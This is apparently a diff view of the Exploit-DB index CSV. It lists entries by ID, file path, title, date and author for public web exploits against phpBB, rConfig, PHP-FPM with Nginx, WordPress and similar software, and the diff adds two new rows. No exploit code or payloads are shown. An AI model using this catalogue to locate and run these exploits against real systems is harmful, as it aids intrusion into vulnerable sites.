44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -41872,3 +41876,5 @@ id,file,description,date,author,type,platform,port
|
|||
47548,exploits/php/webapps/47548.txt,"waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting",2019-10-28,cakes,webapps,php,
|
||||
47550,exploits/php/webapps/47550.txt,"delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection",2019-10-28,cakes,webapps,php,
|
||||
47553,exploits/php/webapps/47553.md,"PHP-FPM + Nginx - Remote Code Execution",2019-10-28,"Emil Lerner",webapps,php,
|
||||
47555,exploits/php/webapps/47555.py,"rConfig 3.9.2 - Remote Code Execution",2019-10-29,Askar,webapps,php,
|
||||
47557,exploits/php/webapps/47557.txt,"Wordpress 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue